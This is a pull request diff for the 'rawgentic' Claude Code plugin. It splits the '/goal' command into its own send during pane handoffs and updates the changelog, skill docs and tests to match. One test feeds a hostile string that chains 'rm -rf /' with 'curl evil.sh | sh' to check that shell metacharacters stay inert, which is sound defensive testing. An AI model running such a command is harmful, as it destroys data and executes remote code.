### PR TITLE
fix(launcher,pane-handoff): send the /goal command as its own send so the guard actually arms

### DIFF
--- a/.claude-plugin/plugin.json
+++ b/.claude-plugin/plugin.json
@@ -1,6 +1,6 @@
 {
   "name": "rawgentic",
-  "version": "3.141.10",
+  "version": "3.141.11",
   "description": "9 SDLC workflow skills + 12 workspace management + 1 planning skill + 2 security skills + hooks for Claude Code: project registration, setup, session binding, requirements interviewing, issue creation, feature implementation, bug fixing, adversarial review, epic auto-run, incident response, peer consultation, post-run workflow self-assessment, epic post-mortem timing analysis, session-history mining with human-gated skill candidates, whole-tree security scanning, security pattern syncing, session-registry housekeeping, gated pane handoff to a fresh session, full-text session-history recall, and dangerous pattern blocking with per-project exceptions.",
   "author": {
     "name": "3D-Stories",

--- a/README.md
+++ b/README.md
@@ -749,6 +749,18 @@ For major changes, please open an issue first to discuss the approach.
 
 ## Changelog
 
+### v3.141.11 (2026-08-08)
+- **The wired `/goal` send pasted its own slash command, so pane handoffs armed nothing (#1007, epic #906).**
+  `build_send_text_goal_argv` built one payload of `/goal ` plus the condition and both call sites sent it as a
+  single paste; Claude Code collapses a large paste into a `[Pasted text #N]` chip, so the command was swallowed
+  and the successor ran an autonomous handoff unguarded while every step reported success. Measured on a
+  throwaway pane: 3,574 chars collapsed and armed nothing, the same condition split across two sends armed first
+  time, and 483 chars never collapsed at all — which is why short test conditions hid it. The builder now returns
+  the sends as a list (`/goal ` alone, then the condition) and both loops in `hooks/launcher_lib.py` iterate every
+  send with per-send failure handling; `skills/pane-handoff/SKILL.md` loses its false claim that the wired path
+  needed no change. 7 tests added, incl. a caller-loop abort test and a drift guard on the corrected sentence.
+  No workflow-spine change -> no diagram REV. Suite 6466->6473.
+
 ### v3.141.10 (2026-08-08)
 - **The WF2 prose corpus now measures WORDS, not only bytes (#899, epic #906).** `tests/test_wf2_prose_budget.py`
   gains `SKILL_WORD_CEILINGS` and a `word_violations()` helper mirroring the existing byte-budget

--- a/README.md
+++ b/README.md
@@ -758,8 +758,8 @@ For major changes, please open an issue first to discuss the approach.
   time, and 483 chars never collapsed at all — which is why short test conditions hid it. The builder now returns
   the sends as a list (`/goal ` alone, then the condition) and both loops in `hooks/launcher_lib.py` iterate every
   send with per-send failure handling; `skills/pane-handoff/SKILL.md` loses its false claim that the wired path
-  needed no change. 7 tests added, incl. a caller-loop abort test and a drift guard on the corrected sentence.
-  No workflow-spine change -> no diagram REV. Suite 6466->6473.
+  needed no change. 8 tests added, incl. two caller-loop abort tests and a drift guard on the corrected sentence.
+  No workflow-spine change -> no diagram REV. Suite 6466->6474.
 
 ### v3.141.10 (2026-08-08)
 - **The WF2 prose corpus now measures WORDS, not only bytes (#899, epic #906).** `tests/test_wf2_prose_budget.py`

--- a/hooks/launcher_lib.py
+++ b/hooks/launcher_lib.py
@@ -624,15 +624,36 @@ def build_send_text_argv(*, pane: str, text: str) -> tuple[list[str], list[str]]
             ["herdr", "pane", "send-keys", pane, "Enter"])
 
 
-def build_send_text_goal_argv(*, pane: str, goal_condition: str) -> tuple[list[str], list[str], bool]:
-    """The proven goal-arming route. Returns (send_text_argv, send_keys_argv, truncated).
+def build_send_text_goal_argv(
+        *, pane: str, goal_condition: str) -> tuple[list[list[str]], list[str], bool]:
+    """The proven goal-arming route. Returns (send_text_argvs, send_keys_argv, truncated).
 
-    `truncated` is returned rather than discarded: a silently shortened goal would guard less
-    than the operator supplied, which the earlier revision did and the review caught.
+    **The command is its own send, and that is the whole point (#1007).** Claude Code collapses a
+    large bracketed paste into one `[Pasted text #N]` chip. Sent as ONE payload, the `/goal `
+    prefix is collapsed with the condition, so no slash command is ever text at the start of the
+    input box: the Enter submits an ordinary message, nothing arms, and the successor runs an
+    autonomous handoff unguarded while every step here reports success.
+
+    Measured 2026-08-08 on a throwaway pane: a 3,574-char condition sent combined rendered as
+    `[Pasted text #1 +20 lines]` and armed nothing; the same condition sent as `/goal ` and then a
+    separate paste rendered as `/goal [Pasted text #2 +20 lines]`, and its Enter armed the guard
+    first time. At 483 characters the combined shape did NOT collapse — the defect is length-gated,
+    which is why short conditions masked it for so long. Two consecutive `send-text` calls
+    concatenate in the input line, which is what makes the split safe.
+
+    A LIST rather than a pair of named returns, deliberately: a caller iterating it cannot silently
+    drop the prefix send, and dropping it is precisely the failure this shape exists to prevent.
+
+    Truncation is unchanged and still caps the WHOLE command including the prefix, because the
+    condition segment is `armed_condition`'s output and
+    `_GOAL_PREFIX + armed_condition(c)[0] == goal_text(c)[0]` for every input. `truncated` is
+    returned rather than discarded: a silently shortened goal would guard less than the operator
+    supplied, which the earlier revision did and the review caught.
     """
-    text, truncated = goal_text(goal_condition)
-    send_text, send_keys = build_send_text_argv(pane=pane, text=text)
-    return (send_text, send_keys, truncated)
+    condition, truncated = armed_condition(goal_condition)
+    prefix_argv, _ = build_send_text_argv(pane=pane, text=_GOAL_PREFIX)
+    condition_argv, send_keys = build_send_text_argv(pane=pane, text=condition)
+    return ([prefix_argv, condition_argv], send_keys, truncated)
 
 
 def build_fallback_launch_argv(*, prompt: str, permission_mode: str,
@@ -3202,10 +3223,16 @@ def perform_handoff(*, anchor_pane: str, cwd: str, project_root: str, name: str,
         # passes, so an unguarded successor never costs the run its predecessor. The residual
         # unguarded window is between send 2 and the row below, and it is bounded by exactly the
         # thing that closes it.
-        text_argv, keys_argv, truncated = build_send_text_goal_argv(
+        send_argvs, keys_argv, truncated = build_send_text_goal_argv(
             pane=new_pane, goal_condition=goal_condition)
         out["truncated"] = truncated
-        for kind, argv in (("send_text", text_argv), ("send_keys", keys_argv)):
+        # The command travels as its own send (#1007) — see `build_send_text_goal_argv`. Each send
+        # is still recorded and still aborts the sequence on its own failure: a dropped prefix
+        # leaves the box holding a bare paste, so pressing on to the Enter would submit the goal
+        # as chat and the run would look armed while it was not.
+        prefix_argv, text_argv = send_argvs
+        for kind, argv in (("send_goal_prefix", prefix_argv), ("send_text", text_argv),
+                           ("send_keys", keys_argv)):
             proc = runner(argv)
             record(kind, argv, proc,
                    note="goal TRUNCATED" if truncated and kind == "send_text" else None)
@@ -5122,10 +5149,12 @@ def retire_predecessor(*, driver_state_path: str, session_id: str, anchor_pane: 
         # it from the successor's transcript would arm the predecessor with the wrong guard, and
         # a capped one silently truncated).
         rearm_baseline = _baseline(read_text, pred_transcript)
-        rearm_text, rearm_keys, truncated = build_send_text_goal_argv(
+        rearm_sends, rearm_keys, truncated = build_send_text_goal_argv(
             pane=anchor_pane, goal_condition=position["goal_condition"])
+        rearm_prefix, rearm_text = rearm_sends
         rearm_sent = True
-        for kind, argv in (("rearm_text", rearm_text), ("rearm_keys", rearm_keys)):
+        for kind, argv in (("rearm_goal_prefix", rearm_prefix), ("rearm_text", rearm_text),
+                           ("rearm_keys", rearm_keys)):
             proc, refusal_why, _kind = _destructive_call(
                 argv, kind, note="goal TRUNCATED" if truncated else None)
             if refusal_why is not None or proc is None \

--- a/hooks/launcher_lib.py
+++ b/hooks/launcher_lib.py
@@ -3230,6 +3230,15 @@ def perform_handoff(*, anchor_pane: str, cwd: str, project_root: str, name: str,
         # is still recorded and still aborts the sequence on its own failure: a dropped prefix
         # leaves the box holding a bare paste, so pressing on to the Enter would submit the goal
         # as chat and the run would look armed while it was not.
+        #
+        # KNOWN RESIDUE, accepted by owner decision 2026-08-08 (#1007 Step-9 review). When the
+        # prefix send succeeds and the condition send does NOT, this pane is left holding a bare
+        # `/goal ` in its input box, and anything typed there later would join onto it. It is not
+        # cleared here on purpose: every key that clears the box (ctrl+c, esc) also interrupts the
+        # pane's running turn, so tidying up would cost a healthy successor its in-flight work to
+        # remove a prefix nobody may ever type after. The residue only arises inside a handoff that
+        # has already failed loudly, and the abort order below is pinned by test so it cannot
+        # silently become "send the Enter anyway".
         prefix_argv, text_argv = send_argvs
         for kind, argv in (("send_goal_prefix", prefix_argv), ("send_text", text_argv),
                            ("send_keys", keys_argv)):
@@ -5149,6 +5158,10 @@ def retire_predecessor(*, driver_state_path: str, session_id: str, anchor_pane: 
         # it from the successor's transcript would arm the predecessor with the wrong guard, and
         # a capped one silently truncated).
         rearm_baseline = _baseline(read_text, pred_transcript)
+        # Same two-send shape and the same accepted residue as the first-arm loop above (#1007).
+        # It matters more here, because this pane is the LIVE predecessor rather than a fresh
+        # successor — but the compensating key would interrupt that predecessor's own turn, which
+        # is the outcome this whole branch exists to avoid.
         rearm_sends, rearm_keys, truncated = build_send_text_goal_argv(
             pane=anchor_pane, goal_condition=position["goal_condition"])
         rearm_prefix, rearm_text = rearm_sends

--- a/plugins/rawgentic/.codex-plugin/plugin.json
+++ b/plugins/rawgentic/.codex-plugin/plugin.json
@@ -1,6 +1,6 @@
 {
   "name": "rawgentic",
-  "version": "3.141.10",
+  "version": "3.141.11",
   "description": "9 SDLC workflow skills + 12 workspace management + 1 planning skill + 2 security skills + hooks for Claude Code: project registration, setup, session binding, requirements interviewing, issue creation, feature implementation, bug fixing, adversarial review, epic auto-run, incident response, peer consultation, post-run workflow self-assessment, epic post-mortem timing analysis, session-history mining with human-gated skill candidates, whole-tree security scanning, security pattern syncing, session-registry housekeeping, gated pane handoff to a fresh session, full-text session-history recall, and dangerous pattern blocking with per-project exceptions.",
   "author": {
     "name": "3D-Stories",

--- a/skills/pane-handoff/SKILL.md
+++ b/skills/pane-handoff/SKILL.md
@@ -176,26 +176,41 @@ owner is away, never a change embedded inside a >500-character paste — and onl
 `--goal-rewrite-approved '<the owner's verbatim answer>'`, which rides the output JSON as the
 audit record. Multiline is fine — put it in a file and pass the path.
 
-**A `/goal` arms only when it STARTS the text that gets submitted (measured 2026-08-07).** The
-command already respects this: it sends `/goal <condition>` as its own paste with nothing in front
-of it, and it refuses to send the goal at all until `prompt_landed` has proven the resume prompt
-already submitted — which is why `--prompt-marker` is `required=True` rather than optional
-("a skipped check is not a gate", `hooks/launcher_lib.py`). So nothing here needs changing for the
-wired path.
+**A slash command runs only when it leads the SUBMISSION — and being its own paste is NOT leading
+it (#1007, measured 2026-08-08).** Claude Code collapses a large bracketed paste into one
+`[Pasted text #N]` chip. A goal sent as a single `/goal <condition>` payload therefore has its own
+prefix collapsed INTO the chip: no slash command is text at the start of the box, the Enter submits
+an ordinary message, and the successor runs unguarded while every step reports success. This page
+previously said the wired path "sends `/goal <condition>` as its own paste with nothing in front of
+it" and therefore needed no change. That was the bug, described as the fix.
 
-It is the **hand-carried** path that breaks, and it broke twice on 2026-08-07. The owner pasted ONE
-block holding the resume prompt and the goal together: no goal armed, nothing warned, and the
+The measurement, on a throwaway pane: a 3,574-character condition sent as ONE payload rendered as
+`❯ [Pasted text #1 +20 lines]` and armed nothing; the SAME condition sent as `/goal ` and then a
+separate paste rendered as `❯ /goal [Pasted text #2 +20 lines]`, and its Enter armed the guard first
+time. At 483 characters the single payload did NOT collapse, which is why the defect hid for so
+long and why a short test condition proves nothing here.
+
+So the wired path delivers the goal as **two** sends — `/goal ` alone, then the condition — before
+the one submit key (`build_send_text_goal_argv`, `hooks/launcher_lib.py`; the primitives themselves
+are documented in `docs/runbooks/herdr.md` §7.1.2). Each send is recorded and aborts the sequence on
+its own failure, because a dropped prefix leaves the box holding a bare paste. The ordering rule is
+unchanged: the goal still goes LAST, and the command still refuses to send it until `prompt_landed`
+has proven the resume prompt already submitted — which is why `--prompt-marker` is `required=True`
+rather than optional ("a skipped check is not a gate", `hooks/launcher_lib.py`).
+
+The **hand-carried** path breaks the same way, and it broke twice on 2026-08-07. The owner pasted
+ONE block holding the resume prompt and the goal together: no goal armed, nothing warned, and the
 successor ran unguarded while looking guarded. Typing `/goal` first and pasting the condition after
 it armed first time. So whenever you hand a HUMAN a goal to carry — a herdr-less fallback, a
 `/clear` resume, any block the owner pastes themselves — print the goal in its own block AND say how
 to send it:
 
 > Submit this on its own, AFTER the resume prompt. Type `/goal` first, then paste the condition.
-> A `/goal` that is not the first thing you send does not arm.
+> The prompt box must read `/goal [Pasted text #N]`. A `/goal` buried inside the paste does not arm.
 
-This is the same defect as the bare-`/tasklist` finding above, seen from the other side: that one is
-a slash command inert at the END of a prompt, this one is a slash command inert in the MIDDLE of a
-paste. One rule covers both — a slash command runs only when it leads the submission.
+This is the same defect as the bare-`/tasklist` finding above, seen from a third side: that one is a
+slash command inert at the END of a prompt, the hand-carried one is inert in the MIDDLE of a paste,
+and this one was inert because the whole submission — prefix included — became one paste.
 
 **Where it runs.** Read your own binding rather than guessing:
 

--- a/tests/hooks/test_adhoc_pane_handoff.py
+++ b/tests/hooks/test_adhoc_pane_handoff.py
@@ -257,10 +257,14 @@ class TestPromptNudge:
         r = Runner(_responses())
         ll.perform_handoff(**_handoff(r, read_text=Artifacts(r, marker_after_nudges=1)))
         texts = r.sent_text()
-        assert len(texts) == 3
+        # FOUR sends, not three, since #1007: the goal's command travels separately from its
+        # condition. The count is still exact on purpose — that is what stops a future recovery
+        # inserting a send of its own.
+        assert len(texts) == 4
         assert texts[0].startswith(ll._driver_lib().BIND_DIRECTIVE)
         assert texts[1] == RESUME_PROMPT
-        assert texts[2].startswith("/goal")
+        assert texts[2] == "/goal "
+        assert texts[3] == GOAL_CONDITION
 
     def test_a_failed_nudge_send_is_its_own_failure_not_poll_exhaustion(self) -> None:
         """Review finding: a broken `send-keys` must not be reported as `prompt_landed` timing out.
@@ -328,9 +332,13 @@ class TestGoalNudge:
             r, read_text=Artifacts(r, marker_after_nudges=0, goal_row_after_nudges=2)))
         assert out["ok"] is True, out["failed_step"]
         assert len(r.nudges()) == 2
-        goal_sends = [t for t in r.sent_text() if t.startswith("/goal")]
-        assert len(goal_sends) == 1, "the goal text was sent more than once"
-        assert goal_sends[0].count(GOAL_CONDITION) == 1
+        sent = r.sent_text()
+        # The goal travels as two sends since #1007 (`/goal ` then the condition), so "sent once"
+        # is counted over the whole send list rather than off a single payload.
+        assert [t for t in sent if t == "/goal "] == ["/goal "], \
+            "the `/goal ` command was sent more than once"
+        assert sum(t.count(GOAL_CONDITION) for t in sent) == 1, \
+            "the goal text was sent more than once"
 
     def test_nudging_is_bounded_and_then_fails_closed(self) -> None:
         """AC6: exhausting the rounds still fails the gate, and the predecessor still survives."""
@@ -411,10 +419,14 @@ class TestGoalNudge:
         ll.perform_handoff(**_handoff(
             r, read_text=Artifacts(r, marker_after_nudges=0, goal_row_after_nudges=1)))
         texts = r.sent_text()
-        assert len(texts) == 3
+        # FOUR sends, not three, since #1007: the goal's command travels separately from its
+        # condition. The count is still exact on purpose — that is what stops a future recovery
+        # inserting a send of its own.
+        assert len(texts) == 4
         assert texts[0].startswith(ll._driver_lib().BIND_DIRECTIVE)
         assert texts[1] == RESUME_PROMPT
-        assert texts[2].startswith("/goal")
+        assert texts[2] == "/goal "
+        assert texts[3] == GOAL_CONDITION
 
 
 class TestGoalNudgeSafety:

--- a/tests/hooks/test_adversarial_review_registration.py
+++ b/tests/hooks/test_adversarial_review_registration.py
@@ -54,7 +54,7 @@ def test_marketplace_registers_skill():
 # a scoped local run that skips this file is exactly how the miss reaches CI.
 # Deliberately not naming the retired module here: tests/test_retirement_tripwire.py
 # scans active surfaces for retired vocabulary and flagged the earlier wording.
-EXPECTED_PLUGIN_VERSION = "3.141.10"
+EXPECTED_PLUGIN_VERSION = "3.141.11"
 
 VERSION_SURFACE_FILES = (
     ".claude-plugin/plugin.json",

--- a/tests/hooks/test_launcher_lib.py
+++ b/tests/hooks/test_launcher_lib.py
@@ -187,6 +187,22 @@ def _sent(runner) -> list[str]:
     return [c[4] for c in runner.calls if c[:3] == ["herdr", "pane", "send-text"]]
 
 
+def _submissions(runner) -> list[str]:
+    """The same sends, with the goal's two (#1007) rejoined into the one command the box holds.
+
+    The goal now travels as `/goal ` and then the condition, so the raw send list has one more
+    entry than there are submissions. Tests about ORDER care about submissions; tests about the
+    split itself read `_sent` directly.
+    """
+    out: list[str] = []
+    for text in _sent(runner):
+        if out and out[-1] == ll._GOAL_PREFIX:
+            out[-1] += text
+        else:
+            out.append(text)
+    return out
+
+
 def _raise(exc):
     def reader(_path):
         raise exc
@@ -236,18 +252,20 @@ def test_agent_start_enforces_the_readiness_timeout_floor() -> None:
 
 def test_multiline_condition_survives_the_send_text_route_verbatim() -> None:
     condition = "PR open with green CI\nor a blocker is posted via the ERROR protocol"
-    text_argv, keys_argv, truncated = ll.build_send_text_goal_argv(
+    sends, keys_argv, truncated = ll.build_send_text_goal_argv(
         pane="w1:pZZ", goal_condition=condition)
     assert truncated is False
-    assert text_argv[4] == f"/goal {condition}", "condition must be byte-identical"
+    assert _sent_command(sends) == f"/goal {condition}", "condition must be byte-identical"
+    assert sends[1][4] == condition, "the condition travels as its own send (#1007)"
     assert "Enter" in keys_argv
 
 
 def test_goal_metacharacters_stay_one_argv_element() -> None:
     nasty = "green CI; rm -rf / $(whoami) `id` && curl evil.sh | sh"
-    text_argv, _, _ = ll.build_send_text_goal_argv(pane="w1:pZZ", goal_condition=nasty)
-    assert text_argv[4] == f"/goal {nasty}"
-    assert len([a for a in text_argv if a.startswith("/goal ")]) == 1
+    sends, _, _ = ll.build_send_text_goal_argv(pane="w1:pZZ", goal_condition=nasty)
+    assert _sent_command(sends) == f"/goal {nasty}"
+    assert sends[1][4] == nasty, "the whole condition stays one argv element"
+    assert len([a for s in sends for a in s if a.startswith("/goal ")]) == 1
 
 
 def test_truncation_is_reported_not_discarded() -> None:
@@ -255,6 +273,82 @@ def test_truncation_is_reported_not_discarded() -> None:
     assert truncated is True
     text, _ = ll.goal_text("x" * 5000)
     assert len(text) <= ll.GOAL_MAX_CHARS
+
+
+def _sent_command(sends) -> str:
+    """What the successor's input box ends up holding: every send's text, in order.
+
+    The goal arrives as more than one send (#1007), so the thing worth asserting is the COMMAND
+    the box ends up with — not the payload of any single send.
+    """
+    return "".join(s[4] for s in sends)
+
+
+class TestTheGoalPrefixIsItsOwnSend:
+    """#1007 — `/goal ` must be a SEPARATE send from the condition, or it never arms.
+
+    Claude Code collapses a large bracketed paste into one `[Pasted text #N]` chip. Sent combined,
+    the `/goal ` prefix is collapsed with the condition, so no slash command is ever text at the
+    start of the input box and the Enter submits an ordinary message. The successor then runs an
+    autonomous handoff with no guard while the handoff reports success.
+
+    Measured 2026-08-08 on a throwaway pane (`w1:pNT`):
+      - a 3,574-char / 21-line condition sent COMBINED rendered as `[Pasted text #1 +20 lines]`
+        and armed nothing;
+      - the SAME condition sent as `/goal ` then a separate paste rendered as
+        `/goal [Pasted text #2 +20 lines]`, and Enter produced `◎ /goal active` plus a stamped
+        `goal_status sentinel=true met=false` row whose condition matched byte-for-byte;
+      - at 483 chars the combined shape did NOT collapse — which is why the short-condition tests
+        in this file all passed against the broken shape.
+    """
+
+    def test_the_skill_no_longer_claims_the_wired_path_needs_no_change(self) -> None:
+        """The claim that shipped the bug. `skills/pane-handoff/SKILL.md` said the wired path
+        "sends `/goal <condition>` as its own paste with nothing in front of it" and therefore
+        needed no change — which is the broken shape described as the fix. Anchored to ONE
+        canonical sentence in ONE file, per this repo's drift-guard convention."""
+        text = (REPO_ROOT / "skills" / "pane-handoff" / "SKILL.md").read_text(encoding="utf-8")
+        assert "nothing here needs changing for the wired path" not in text
+        assert "being its own paste is NOT leading" in text, \
+            "the corrected rule must stay stated in the skill"
+
+    def test_the_prefix_and_the_condition_are_two_separate_sends(self) -> None:
+        sends, keys_argv, truncated = ll.build_send_text_goal_argv(
+            pane="w1:pZZ", goal_condition="ship it when CI is green")
+        assert len(sends) == 2, sends
+        assert sends[0][4] == "/goal ", "the command must be its own short send"
+        assert sends[1][4] == "ship it when CI is green"
+        assert "/goal" not in sends[1][4], "the condition send must not re-carry the command"
+        assert all(s[:3] == ["herdr", "pane", "send-text"] for s in sends), sends
+        assert "Enter" in keys_argv
+        assert truncated is False
+
+    def test_the_sends_concatenate_to_the_whole_command(self) -> None:
+        """The box must end up holding exactly what the single send used to carry."""
+        cond = "line one\nline two\n\nline four"
+        sends, _keys, _trunc = ll.build_send_text_goal_argv(pane="w1:p1", goal_condition=cond)
+        text, _ = ll.goal_text(cond)
+        assert _sent_command(sends) == text
+
+    def test_truncation_still_caps_the_whole_command_including_the_prefix(self) -> None:
+        """The cap applies to the command, not to the condition alone — and the condition send
+        must carry exactly what the successor's `goal_status` row will hold, or `goal_armed`
+        can never match and predecessor teardown never fires."""
+        sends, _keys, truncated = ll.build_send_text_goal_argv(
+            pane="w1:p1", goal_condition="x" * 5000)
+        assert truncated is True
+        assert len(_sent_command(sends)) <= ll.GOAL_MAX_CHARS
+        armed, _ = ll.armed_condition("x" * 5000)
+        assert sends[1][4] == armed
+
+    def test_a_long_realistic_condition_still_leads_with_the_command(self) -> None:
+        """The regression that mattered: a real owner goal runs 1,200-2,000 chars, well past the
+        length at which the combined shape collapses."""
+        cond = "\n".join("Filler line %02d carries no instruction." % i for i in range(1, 40))
+        assert len(cond) > 1200
+        sends, _keys, _trunc = ll.build_send_text_goal_argv(pane="w1:p1", goal_condition=cond)
+        assert sends[0][4] == "/goal "
+        assert sends[1][4] == cond
 
 
 @pytest.mark.parametrize("bad", [False, 0, [], {}, None, 123])
@@ -437,7 +531,8 @@ class TestPerformHandoff:
             "herdr pane send-text", "herdr pane send-keys",     # SEND 1 — the bind, alone
             "herdr pane send-text", "herdr pane send-keys",     # SEND 2 — the resume prompt
             "herdr agent wait",                                 # the settle's advisory confirm
-            "herdr pane send-text", "herdr pane send-keys",     # SEND 3 — the goal, LAST
+            "herdr pane send-text",                             # SEND 3a — `/goal `, its own send
+            "herdr pane send-text", "herdr pane send-keys",     # SEND 3b — the condition, LAST
             "herdr pane close",                                 # the predecessor, LAST of all
         ]
         assert out["cleanup"] is None, "nothing to clean up when ownership transferred"
@@ -631,34 +726,35 @@ class TestTheGoalPayloadNeverEndsWithANewline:
     """
 
     def test_a_trailing_newline_is_stripped_from_the_sent_payload(self) -> None:
-        text_argv, _keys, _trunc = ll.build_send_text_goal_argv(
+        sends, _keys, _trunc = ll.build_send_text_goal_argv(
             pane="w1:p1", goal_condition="ship it when CI is green\n")
-        assert not text_argv[4].endswith("\n"), repr(text_argv[4][-40:])
-        assert text_argv[4] == "/goal ship it when CI is green"
+        assert not sends[1][4].endswith("\n"), repr(sends[1][4][-40:])
+        assert _sent_command(sends) == "/goal ship it when CI is green"
 
     def test_trailing_blank_lines_and_spaces_go_too(self) -> None:
         """A file written by a heredoc routinely ends `...\\n`, and an edited one `...\\n\\n  `."""
-        text_argv, _keys, _trunc = ll.build_send_text_goal_argv(
+        sends, _keys, _trunc = ll.build_send_text_goal_argv(
             pane="w1:p1", goal_condition="ship it\n\n   \n")
-        assert text_argv[4] == "/goal ship it"
+        assert _sent_command(sends) == "/goal ship it"
 
     def test_armed_condition_matches_what_was_actually_sent(self) -> None:
         """The binding check compares against this. If the strip happened in only one of the two,
         every capped or file-sourced goal would fail to verify for ever."""
         cond, _trunc = ll.armed_condition("ship it when CI is green\n")
-        text_argv, _keys, _trunc2 = ll.build_send_text_goal_argv(
+        sends, _keys, _trunc2 = ll.build_send_text_goal_argv(
             pane="w1:p1", goal_condition="ship it when CI is green\n")
         assert cond == "ship it when CI is green"
-        assert text_argv[4] == "/goal " + cond
+        assert _sent_command(sends) == "/goal " + cond
+        assert sends[1][4] == cond, "the condition send IS what the goal_status row will carry"
 
     def test_interior_newlines_are_untouched(self) -> None:
         """#654 proved a 41-newline condition arrives fine as a collapsed paste. Only the TRAILING
         newline breaks submission, so stripping interior structure would be a regression."""
         cond = "line one\nline two\n\nline four"
-        text_argv, _keys, _trunc = ll.build_send_text_goal_argv(
+        sends, _keys, _trunc = ll.build_send_text_goal_argv(
             pane="w1:p1", goal_condition=cond + "\n")
-        assert text_argv[4] == "/goal " + cond
-        assert text_argv[4].count("\n") == 3
+        assert _sent_command(sends) == "/goal " + cond
+        assert _sent_command(sends).count("\n") == 3
 
     def test_a_condition_that_is_only_whitespace_is_still_refused(self) -> None:
         """Stripping must not turn an empty guard into a silently-armed one."""
@@ -685,21 +781,21 @@ class TestTheGoalPayloadNeverEndsWithANewline:
         silently deleted terminal spaces and tabs, which never blocked submission and which the
         carry contract treats as bytes. So the strip fires only on a whitespace run that actually
         contains a line ending."""
-        text_argv, _keys, _trunc = ll.build_send_text_goal_argv(
+        sends, _keys, _trunc = ll.build_send_text_goal_argv(
             pane="w1:p1", goal_condition="ship it   ")
-        assert text_argv[4] == "/goal ship it   ", repr(text_argv[4])
+        assert _sent_command(sends) == "/goal ship it   ", repr(_sent_command(sends))
 
     def test_spaces_before_a_trailing_newline_go_with_it(self) -> None:
         """A real file routinely ends `...   \\n`. The whole run goes, because it contains one."""
-        text_argv, _keys, _trunc = ll.build_send_text_goal_argv(
+        sends, _keys, _trunc = ll.build_send_text_goal_argv(
             pane="w1:p1", goal_condition="ship it   \n")
-        assert text_argv[4] == "/goal ship it"
+        assert _sent_command(sends) == "/goal ship it"
 
     @pytest.mark.parametrize("ending", ["\n", "\r\n", "\r"])
     def test_every_line_ending_form_is_stripped_from_the_payload(self, ending) -> None:
-        text_argv, _keys, _trunc = ll.build_send_text_goal_argv(
+        sends, _keys, _trunc = ll.build_send_text_goal_argv(
             pane="w1:p1", goal_condition="ship it" + ending)
-        assert text_argv[4] == "/goal ship it", repr(text_argv[4])
+        assert _sent_command(sends) == "/goal ship it", repr(_sent_command(sends))
 
     def test_the_carry_guard_keeps_its_byte_identical_rule(self) -> None:
         """The interaction this fix nearly broke, pinned from BOTH sides.
@@ -1083,7 +1179,7 @@ class TestResumePrompt:
         r = Runner({"herdr pane split": SPLIT_OK, "herdr pane get": PANE_GET_OK})
         out = ll.perform_handoff(runner=r, **_handoff())
         assert out["ok"] is True, out
-        assert _sent(r) == [f"/rawgentic:switch {PROJECT}", RESUME_PROMPT,
+        assert _submissions(r) == [f"/rawgentic:switch {PROJECT}", RESUME_PROMPT,
                             f"/goal {GOAL_CONDITION}"]
 
     def test_resume_prompt_waits_until_the_BIND_is_VERIFIED_landed(self) -> None:
@@ -1841,6 +1937,41 @@ class TestTheThreeSendsAreOrderedAndGated:
         out = ll.perform_handoff(runner=r, **_handoff())
         assert out["ok"] is True, out
         assert self._send_texts(out) == ["send_bind", "send_resume_prompt", "send_text"]
+
+    def test_the_goal_is_two_sends_the_command_then_the_condition(self) -> None:
+        """#1007 — the builder splitting is not enough; the CALLER must send both parts. A loop
+        that iterated only the first element would arm nothing and still look green."""
+        r = Runner({"herdr pane split": SPLIT_OK, "herdr pane get": PANE_GET_OK})
+        out = ll.perform_handoff(runner=r, **_handoff())
+        assert out["ok"] is True, out
+        kinds = [s["kind"] for s in out["steps"]]
+        assert "send_goal_prefix" in kinds, kinds
+        assert kinds.index("send_goal_prefix") < kinds.index("send_text") \
+            < kinds.index("send_keys"), kinds
+        sent = [c[4] for c in r.calls if c[:3] == ["herdr", "pane", "send-text"]]
+        assert "/goal " in sent, sent
+        assert sent.index("/goal ") == len(sent) - 2, \
+            "the command must immediately precede the condition send"
+        assert sent[-1] == GOAL_CONDITION
+
+    def test_a_failed_prefix_send_aborts_before_the_condition_and_the_enter(self) -> None:
+        """Per-send failure handling must survive the split: a dropped prefix leaves the box
+        holding a bare paste, so continuing to the Enter would submit the goal as chat."""
+
+        class PrefixFails(Runner):
+            def __call__(self, argv, timeout=180):
+                if argv[:3] == ["herdr", "pane", "send-text"] and argv[4] == "/goal ":
+                    self.calls.append(list(argv))
+                    return FakeProc(returncode=1)
+                return super().__call__(argv, timeout=timeout)
+
+        r = PrefixFails({"herdr pane split": SPLIT_OK, "herdr pane get": PANE_GET_OK})
+        out = ll.perform_handoff(runner=r, **_handoff())
+        assert out["ok"] is False
+        assert out["failed_step"] == "send_goal_prefix", out.get("failed_step")
+        sent = [c[4] for c in r.calls if c[:3] == ["herdr", "pane", "send-text"]]
+        assert GOAL_CONDITION not in sent, "the condition was sent after the prefix failed"
+        assert not _predecessor_closed(r)
 
     def test_the_bind_is_its_own_send_carrying_the_project(self) -> None:
         """A bare `/rawgentic:switch` enters the switch skill's LIST MODE and waits for a human

--- a/tests/hooks/test_launcher_lib.py
+++ b/tests/hooks/test_launcher_lib.py
@@ -1973,6 +1973,35 @@ class TestTheThreeSendsAreOrderedAndGated:
         assert GOAL_CONDITION not in sent, "the condition was sent after the prefix failed"
         assert not _predecessor_closed(r)
 
+    def test_a_failed_condition_send_aborts_before_the_enter(self) -> None:
+        """The other half of the split's failure handling, and the pin behind an accepted residue.
+
+        Owner decision 2026-08-08 (#1007 Step-9 review): when the prefix lands and the condition
+        does not, the pane keeps a bare `/goal ` in its input box and it is NOT cleared, because
+        every key that clears the box also interrupts the pane's running turn. What must never
+        drift is the abort itself — sending the Enter anyway would submit a bare `/goal ` as the
+        whole command.
+        """
+
+        class ConditionFails(Runner):
+            def __call__(self, argv, timeout=180):
+                if argv[:3] == ["herdr", "pane", "send-text"] and argv[4] == GOAL_CONDITION:
+                    self.calls.append(list(argv))
+                    return FakeProc(returncode=1)
+                return super().__call__(argv, timeout=timeout)
+
+        r = ConditionFails({"herdr pane split": SPLIT_OK, "herdr pane get": PANE_GET_OK})
+        out = ll.perform_handoff(runner=r, **_handoff())
+        assert out["ok"] is False
+        assert out["failed_step"] == "send_text", out.get("failed_step")
+        sent = [c[4] for c in r.calls if c[:3] == ["herdr", "pane", "send-text"]]
+        assert sent[-2:] == ["/goal ", GOAL_CONDITION], sent
+        goal_enters = [c for c in r.calls
+                       if c[:3] == ["herdr", "pane", "send-keys"] and c[4] == "Enter"]
+        assert len(goal_enters) == 2, \
+            "only the bind and the resume prompt may have been submitted, never the goal"
+        assert not _predecessor_closed(r)
+
     def test_the_bind_is_its_own_send_carrying_the_project(self) -> None:
         """A bare `/rawgentic:switch` enters the switch skill's LIST MODE and waits for a human
